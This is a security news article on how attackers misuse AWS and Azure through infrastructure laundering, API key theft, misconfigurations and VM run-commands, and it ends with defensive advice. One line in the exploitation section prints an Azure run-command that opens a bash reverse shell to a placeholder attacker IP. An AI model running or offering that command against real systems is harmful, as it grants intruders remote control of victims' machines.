Hackers Abusing AWS & Microsoft Azure To Launch Large-Scale Cyber Attacks

Hackers are increasingly leveraging cloud platforms like Amazon Web Services (AWS) and Microsoft Azure to orchestrate large-scale cyber attacks.

These platforms, which host critical infrastructure for businesses worldwide, are being exploited through sophisticated methods, including fraudulent account setups, API key theft, and infrastructure laundering.

The mechanics of the exploitation:-

1. Infrastructure Laundering: A notable tactic involves “infrastructure laundering,” where threat actors use stolen or fraudulent accounts to rent IP addresses from AWS and Azure. For instance, the FUNNULL Content Delivery Network (CDN) has rented over 1,200 IPs from AWS and nearly 200 from Azure. These IPs are mapped to malicious domains using CNAME records, enabling phishing campaigns, investment scams, and money laundering operations.
2. API Key Theft: Hackers have also targeted API keys in both AWS and Azure environments. In one case, Microsoft identified systematic API key theft from multiple customers, which was used to bypass security controls and generate harmful content via Azure OpenAI services. The attackers employed reverse proxy services to mimic legitimate API calls.
3. Cloud Misconfigurations: Misconfigured cloud resources remain a significant vulnerability. Attackers exploit publicly accessible S3 buckets in AWS or weak security policies in Azure to access sensitive data. Tools like AWSBucketDump automate the discovery of such misconfigurations.
4. Advanced Exploitation Techniques: Using Azure’s RunShellScript command or AWS’s public AMIs (Amazon Machine Images), attackers gain remote access to virtual machines (VMs) and extract sensitive metadata or credentials. For example:

   az vm run-command invoke -g <GROUP-NAME> -n <VM-NAME> --command-id RunShellScript --scripts "bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/9090 0>&1'"

Silent Push researchers discovered that this command grants a reverse shell on a Linux VM hosted on Azure.

Impact of the Attacks

FUNNULL’s infrastructure is linked to phishing campaigns involving over 200,000 malicious hostnames generated via Domain Generation Algorithms, targeting major brands like Microsoft and Google.

In addition, attackers utilize compromised environments to exfiltrate sensitive data before erasing it and demanding ransom payments, a tactic recently seen in AWS breaches affecting over 230 million cloud environments.

Moreover, FUNNULL has engaged in supply chain attacks, notably hijacking a popular JavaScript library to infect over 110,000 websites.

To counter these threats, organizations must adopt robust cloud security measures. This includes deploying enhanced monitoring tools like GuardDuty for AWS or Microsoft Defender for Cloud to detect suspicious activities in real time.

Additionally, API security can be strengthened by regularly rotating API keys and restricting their usage based on IP or time constraints.

Regular configuration audits of cloud resources help identify misconfigurations, and implementing a Zero Trust Architecture with multi-factor authentication (MFA) and least privilege access policies further safeguards the environment.

Both AWS and Microsoft have acknowledged the challenges posed by these attacks. By addressing these vulnerabilities head-on, businesses can fortify their defenses against the misuse of cloud platforms for cybercrime.

Are you from SOC/DFIR Teams? – Analyse Malware Files & Links with ANY.RUN Sandox -> Start Now for Free.